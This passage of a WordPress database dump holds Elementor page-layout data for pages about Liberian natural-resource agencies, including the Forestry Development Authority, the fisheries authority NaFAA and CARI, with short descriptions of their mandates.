More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mogcsp\\\",\\\"tag_id\\\":\\\"64\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mogcsp\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7758e3b1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"766d660a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1a4a49d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a94bfb8\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mogcsp\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8842,1584,'_dp_original','1582'),(8843,1584,'_edit_last','38'),(8904,1586,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8905,1586,'slide_template','default'),(8907,1586,'_elementor_template_type','wp-post'),(8908,1586,'_elementor_version','2.7.5'),(8909,1586,'_wp_page_template','default'),(8910,1586,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ef0e5ce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Forestry Development Authority (FDA) is mandated to sustainably manage and conserve all forest resources for the benefit of present and future generation. The National Resource Law and recent National Forestry Reform Law are legal instruments that strengthened its mandate and served as guides for the management of forest resources in Liberia.<\\/p><p>Integrating the 3-Cs approach, FDA works to conserve and sustainably manage forest resources to enable them continue to provision complete range of goods and services for the benefit of all Liberians and also to contribute to the reduction of poverty.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3dbc9ac\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"f919375\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e1d953c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"15781ca\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"fda\\\",\\\"tag_id\\\":\\\"53\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"fda\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f10ae8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"7e78c45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1160609\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"573143f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"455a18c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2875b46\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:fda\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8911,1586,'_dp_original','1584'),(8912,1586,'_edit_last','38'),(8914,1588,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8915,1588,'slide_template','default'),(8917,1588,'_elementor_template_type','wp-post'),(8918,1588,'_elementor_version','2.7.5'),(8919,1588,'_wp_page_template','default'),(8920,1588,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"aafb093\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.<\\/p>\\n<p>The overall fisheries sector goal is: Sustainably managed and economically viable fisheries that generate prosperity for the present and generations yet unborn.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db49c3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"793fd76\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e046628\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48352ba\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"nafaa\\\",\\\"tag_id\\\":\\\"65\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"nafaa\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2e54ec5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d6bc921\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"70ac5b1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0e5b35e\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:nafaa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8922,1588,'_dp_original','1586'),(8923,1588,'_edit_last','42'),(8924,1590,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8925,1590,'slide_template','default'),(8927,1590,'_elementor_template_type','wp-post'),(8928,1590,'_elementor_version','2.7.5'),(8929,1590,'_wp_page_template','default'),(8930,1590,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a1cd518\",\"elType\":\"widget\",\"settings\":{\"editor\":\"National Legislature on Natural Resources Committee coming soon!\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9db38fc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"571a245f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a94bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1d96f140\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"national-legislature\\\",\\\"tag_id\\\":\\\"66\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"national-legislature\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"572e4794\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"65306131\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"30437ac5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1bd7b4a2\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:national-legislature\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8932,1590,'_dp_original','1588'),(8933,1590,'_edit_last','42'),(8934,1592,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8935,1592,'slide_template','default'),(8937,1592,'_elementor_template_type','wp-post'),(8938,1592,'_elementor_version','2.7.5'),(8939,1592,'_wp_page_template','default'),(8940,1592,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"20cbe9f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>CARI\'s strategy is designed to enhance the its capacity, research and development (R&amp;D) partners to react rapidly to the needs of the stakeholders on knowledge, information and technologies (KIT) required pursuing effective management of natural resources for agriculture and environment in Liberia.<\\/p><p>CARI strategy also provides the focus and guiding principles for achieving a client-oriented and demand-led research for development, with special emphasis on smallholder farmers and entrepreneurs in the agricultural 